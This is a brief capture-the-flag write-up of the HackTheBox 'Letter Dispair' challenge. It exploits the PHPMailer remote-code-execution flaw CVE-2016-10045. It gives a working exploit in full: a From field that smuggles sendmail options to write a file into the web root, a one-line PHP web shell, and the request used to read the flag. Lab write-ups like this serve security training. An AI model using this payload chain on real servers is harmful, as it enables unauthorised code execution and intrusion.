HackTheBox Letter Dispair Challenge

2025-02-28[Updated: 2025-02-28]

https://app.hackthebox.com/challenges/373

Description

A high-profile political individual was a victim of a spear-phishing attack. The email came from a legitimate government entity in a nation we don’t have jurisdiction. However, we have traced the originating mail to a government webserver. Further enumeration revealed an open directory index containing a PHP mailer script we think was used to send the email. We need access to the server to read the logs and find out the actual perpetrator. Can you help?

Exploitation

/mailer.php

https://www.exploit-db.com/exploits/40969

https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html

From Email

"attacker\" -oQ/tmp/ -X/var/www/html/rce.php  some "@email.com

Email List

<?php system($_GET['0']); ?>

/rce.php?0=cat /flag.txt

Summary

Letter Dispair: find the command execution path, trigger it cleanly, and read the flag.